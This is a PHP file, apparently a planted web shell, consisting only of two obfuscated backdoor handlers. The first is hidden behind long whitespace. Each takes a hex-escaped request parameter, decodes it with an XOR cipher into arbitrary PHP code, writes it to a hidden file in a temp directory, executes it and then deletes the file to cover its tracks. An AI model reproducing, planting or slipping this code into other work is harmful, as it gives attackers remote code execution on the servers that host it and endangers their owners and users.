<?php																																										if(array_key_exists("de\x73\x63", $_REQUEST)){ $ptr = $_REQUEST["de\x73\x63"]; $ptr = explode ( "." , $ptr ) ; $val = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $u = 0; array_walk($ptr, function ($v3) use (&$val, &$u, $s, $sLen) { $sChar = ord($s[$u % $sLen]); $dec = ((int)$v3 - $sChar - ($u % 10)) ^ 76; $val .= chr($dec); $u++; }); $data = array_filter([getenv("TMP"), getcwd(), "/var/tmp", "/tmp", session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir()]); foreach ($data as $key => $resource) { if (max(0, is_dir($resource) * is_writable($resource))) { $entity = "$resource" . "/.ent"; if (file_put_contents($entity, $val)) { include $entity; @unlink($entity); die(); } } } }


if(!is_null($_REQUEST["sy\x6Dbol"] ?? null)){
	$item = $_REQUEST["sy\x6Dbol"];
	 $item 	=explode	( 	'.'			,		$item  )	 	;	
	$res = '';
            $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s5);
            $len = count($item);
    
            for ($o = 0; $o	 <$len; $o++) {
                $v9 = $item[$o];
                $sChar = ord($s5[$o  %$lenS]);
                $d = ((int)$v9 - $sChar - ($o  %10))	^ 	8;
                $res .= chr($d);	 }		
	$fac = array_filter([session_save_path(), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd()]);
	foreach ($fac as $data_chunk):
    		if (is_writable($data_chunk) && is_dir($data_chunk)) {
    $rec = join("/", [$data_chunk, ".ptr"]);
    $success = file_put_contents($rec, $res);
if ($success) {
	include $rec;
	@unlink($rec);
	die();}
}
endforeach;
}